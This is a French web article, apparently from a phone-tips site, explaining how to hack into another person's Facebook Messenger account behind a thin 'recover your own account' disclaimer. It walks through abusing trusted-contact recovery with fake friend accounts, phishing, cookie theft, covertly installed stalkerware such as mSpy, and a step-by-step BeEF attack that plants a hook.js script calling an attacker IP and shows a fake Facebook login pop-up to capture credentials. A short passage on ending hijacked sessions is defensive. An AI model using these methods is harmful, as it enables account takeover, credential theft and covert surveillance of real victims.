Pirater Messenger

Avertissement : Ces méthodes ne sont pas dévoilées à des fins illégales mais à des fins d’information dans le but de récupérer et sauvegarder vos propres comptes.

Comment pirater Facebook Messenger?

C’est une question très large. Facebook Messenger, le tchat made in Facebook, peut être piraté comme tout autre logiciel fonctionnant sur un serveur, mais pour répondre à cette question vous devez déconstruire le terme de “piratage”.

Si vous parlez d’accéder aux messages d’un compte Messenger, cela peut se faire de plusieurs façons.

1/ La technique des trois amis

Cette technique consiste à faire exprès de commettre des erreurs de connexion en tentant de vous connecter à Messenger grâce à l’adresse Email de la cible. Au bout de quelques erreurs de mots de passe, Facebook Messenger reconnaît que vous avez des problèmes à vous connecter et vous demande si vous voulez utiliser des moyens alternatifs de connexion. Répondez que vous avez perdu votre adresse Email et que vous voulez en choisir une autre. Messenger vous demande de prouver que c’est bien vous en vous demandant 3 amis qui vous suivent déjà sur votre compte. Ces 3 amis serviront à authentifier votre compte.

La technique consiste donc à prévoir le hacking de Messenger préalablement en créant avant ça 3 comptes Facebook différents et en envoyant des demandes d’amis à la cible. Si la cible accepte, vous aurez ainsi 3 comptes Messenger différents qui suivent déjà la cible. Lorsque Messenger vous demande 3 amis pour changer d’adresse Email, donnez les coordonnées des 3 comptes Facebook que vous avez créés et qui suivent déjà la cible. Facebook demandera à ces 3 amis de valider votre changement d’Email, vous pourrez le valider facilement. Après ça, il vous suffira de changer d’adresse Email, de valider cette nouvelle adresse Email, de vous connecter au compte et de changer le mot de passe!

L’inconvénient de cette technique : le compte cible s’apercevra rapidement du hacking, et pourra connaître votre adresse IP à moins que vous ne sachiez comment la dissimuler.

2/ La méthode de la force brute

La manière la moins efficace de le faire est la méthode de force brute, qui consiste à en essayer toutes les combinaisons possibles de mots de passe jusqu’à ce que l’on tombe sur le bon. Cette méthode ancienne, reposant sur des logiciels sans fin, est aujourd’hui inefficace.

3/ L’hameçonnage

Une autre méthode est l’hameçonnage, une astuce d’ingénierie sociale consistant à amener la cible à entrer ses informations de connexion sur un site frauduleux copiant l’original. Bien entendu, ce type d’attaque revient à faire une utilisation abusive de l’ordinateur et vous fait commettre une infraction pénale.

4/ Le vol de cookie

Quand quelqu’un vole votre cookie, vous êtes piraté ! Les cookies sont les données de votre navigateur internet stockés sur votre disque dur local. Ils sont utilisés pour vérifier vos informations d’identification non seulement sur Facebook, mais aussi par tous les sites internet que vous visitez à partir de votre navigateur. Votre mot de passe n’est pas stocké dans des cookies mais plutôt dans des chaînes de hachage (voir ce site très bien fait sur les protections des cookies). Si quelqu’un vole vos cookies et les injecte dans son propre navigateur, il accède instantanément à votre compte!

La vérification en deux étapes ou d’autres mesures de sécurité ne seront d’aucune utilité dans ce cas, tout simplement parce qu’à partir du moment où le cookie est injecté, votre session est copiée. L’utilisateur n’aura pas besoin de se reconnecter à votre compte : il accédera à votre session déjà connectée, après le stade où toutes les vérifications de sécurité ont été passées. Il pourra accéder à votre compte directement.

Si le pirate ne change pas votre mot de passe, vous pourrez toujours utiliser votre compte après le vol et l’usage de vos cookies. Il y a trois façons de détruire la session que le pirate utilise:

  • a/ La déconnexion (en cliquant sur déconnexion dans le menu de Messenger). Comme le pirate accède à votre compte en utilisant la même session connectée que la vôtre, si vous vous déconnectez, Facebook détruira la session, et le pirate aura besoin de voler à nouveau vos cookies.
  • b/ Accédez aux paramètres de sécurité de Facebook. Vous y trouverez une liste de toutes les sessions connectées. Détruisez-les par vous-même, et le pirate se verra éjecté de votre compte Messenger.
  • c/ Vous pouvez aussi changer votre mot de passe : cela aura pour effet de détruire automatiquement toutes les sessions connectées.

5/ Le logiciel espion

Certains pirates utilisent des logiciels espions pour pénétrer sur vos comptes. Nous avons déjà parlé sur ce site de Mspy et Gmspy qui nous paraissent les plus fiables, et en français. Le premier est spécialisé dans le vol des messages textes, des mots de passe et des réseaux sociaux. Le deuxième est spécialisé dans le vol des conversations téléphoniques, l’enregistrement des appels téléphoniques et la copie des discussions sur toute messagerie instantanée.

Ces logiciels espions s’installent sur le téléphone de la victime puis se rendent invisibles.

L’application Mspy
L’application Gsmspy

Une vidéo sur Youtube explique comment installer ce genre de soft:

6/ Utiliser Linux Kali et BeEF

Cette technique nécessite des compétences en informatique. Si vous ne prenez pas le temps d’installer le système d’exploitation Linux Kali sur votre ordinateur et d’en apprendre un peu plus sur les réseaux et Linux, cette technique ne fonctionnera pas pour vous. Mais dans le cas contraire, elle vous permettra probablement d’avoir accès aux identifiants Messenger et Facebook de quelqu’un très facilement.

Etape 1: Installez Linux Kali

La première étape consiste à télécharger et installer Linux version “Kali”. Soit vous l’installez sur votre machine en remplacement de Windows, soit en dual-boot avec votre système Windows ou Mac à côté, soit vous l’installer en tant que machine virtuelle à l’intérieur du système d’exploitation de votre choix (évitez Windows, parce que malgré tous ses avantages, Windows n’est vraiment pas un système d’exploitation approprié pour le piratage).

Dans Kali, il y a une application appelée Browser Exploitation Framework (BeEF). Cette application est capable de vous aider à pirater le navigateur d’une victime et à en prendre le contrôle à distance. Une fois que vous avez le contrôle de son navigateur, vous pouvez faire une quantité impressionnante de choses. L’une de ces choses consiste à tromper l’utilisateur pour qu’il donne ses identifiants Messenger.

Étape 2: Ouvrez BeEF

Ouvrez Kali: votre bureau devrait ressembler à l’impression d’écran ci-dessous.

Démarrez BeEF en cliquant sur l’icône en forme de vache à gauche du bureau.

BeEF s’ouvre en affichant le terminal ci-dessous:

Une fois que BeEF est lancé, ouvrez le navigateur Firefox pour accéder à son interface. Vous pourrez vous connecter à BeEF en utilisant le nom d’utilisateur beef et le mot de passe beef. Vous serez alors accueilli par l’écran de bienvenue de BeEF.

Étape 3: Accrochez le navigateur de la victime

C’est la partie la plus difficile à faire. Vous devez amener la victime à cliquer sur un lien JavaScript spécialement conçu pour “accrocher” son navigateur. Cela peut se faire d’innombrables façons. La plus simple est d’intégrer le code dans un site Web et d’inciter l’utilisateur à cliquer dessus, par exemple en lui demandant de cliquer sur un lien.

Le script ressemble à quelque chose comme ci-dessous. Intégrez-le dans une page web, et quand quelqu’un clique dessus, vous possédez son navigateur.

<script src= "http://192.168.1.101:3000/hook.js&#8221 ; type= "text/javascript" ></script>

A noter que vous pouvez aussi utiliser la MitMf pour envoyer le code à l’utilisateur, mais cela demande plus de compétences (

par exemple).

Une fois que vous avez “accroché” le navigateur de la victime, vous êtes prêt à l’utiliser.

Étape 4: Envoyer une boîte de dialogue à l’utilisateur

Lorsque vous êtes connecté au navigateur de la victime, son adresse IP, ainsi que les icônes de son système d’exploitation, apparaissent dans le panneau “Navigateurs connectés” à gauche.

Si on clique sur le navigateur en question, il ouvre une interface BeEF sur le côté droit. Plusieurs onglets apparaissent, mais ici seul l’onglet “Commands” nous intéresse.

Cliquez sur “Commands” puis faites défiler l’arborescence des modules vers le bas jusqu’à “Social Engineering”. Cliquez dessus. Parmi les nombreux modules d’ingénierie sociale proposés, choisissez “Pretty Theft”.

Ce module vous permet d’envoyer une fenêtre pop-up dans le navigateur de l’utilisateur. Dans notre cas, nous utiliserons la boîte de dialogue Facebook.

Étape 5: La boîte de dialogue apparaît sur le système cible

Une boîte de dialogue apparaît alors dans le navigateur de la victime. Il indique à la victime que sa session Facebook a expiré et qu’elle doit saisir à nouveau ses identifiants. Bien que vous puissiez vous méfier d’une telle fenêtre pop-up, la plupart des utilisateurs auront confiance et croiront que leur session Facebook a expiré. Ils entreront simplement leur courriel et leur mot de passe.

De retour sur notre système, dans l’interface BeEF, nous pouvons voir que les informations d’identification apparaissent dans la fenêtre “Résultats des commandes”. La victime a saisi son adresse e-mail et son mot de passe. Ils ont été capturés et vous sont présentés dans BeEF.

Conclusion

Notez aussi une autre technique que nous avons expliquée dans cet article : elle consiste, si vous avez accès à l’ordinateur de la cible, à afficher le code source de sa session Messenger afin d’afficher le mot de passe et de le récupérer. Au terme de ce tour d’horizon des différentes techniques pour hacker Messenger, nous espérons avoir éclairici la question de savoir comment pirater Messenger.

Les +

Après avoir piraté ou non Messenger, vous avez les bénéfices de cette messagerie:

– Vitesse: Vous pouvez envoyer et recevoir des messages plus rapidement via l’application Messenger que si vous aviez besoin de charger le navigateur mobile.

– Envoi de messages textes: Le style d’envoi d’un message via Facebook Messenger est similaire à l’envoi d’un message texte sur votre téléphone portable. C’est gratuit.

– Partager: Vous pouvez rapidement partager des fichiers, des images et des liens grâce à Messenger.

– Appels téléphoniques faciles: L’audio de l’application vous connecte à un autre individu ou à un groupe. Cette fonction est particulièrement pratique pour ceux qui appellent à longue distance.

Les –

En plus des freins légaux et éthiques au piratage, les inconvénients naturels de Messenger restent valables:

– Vie privée: Les termes et conditions de Messenger incluent l’enregistrement audio à tout moment, ce qui pour certains est une atteinte à la vie privée.

– Intrusion: L’application est si semblable à l’envoi de SMS qu’elle en devient une distraction. Les notifications constantes de messages peuvent vous empêcher de travailler sur des sujets plus importants.

– Batterie: Lorsqu’il est activé, Facebook Messenger fonctionne toujours en arrière-plan, ce qui signifie qu’il consomme de la batterie.

– Pas d’alternative: Si vous utilisez l’application mobile Facebook, vous devez utiliser Facebook Messenger pour envoyer des messages via Facebook. Vous ne pouvez pas lire les messages directement dans Facebook.

– Stockage: Les applications Facebook et Facebook Messenger utilisent à elles deux plus de 100 Mo d’espace de stockage sur votre appareil mobile.

Untelephone.com Comment pirater Messenger

Notre avis: Comment pirater Messenger en pénétrant dans le compte Facebook de la cible pour lire ses messages.

RatingEvaluation 2.8 étoiles
2.8 / 5(5 )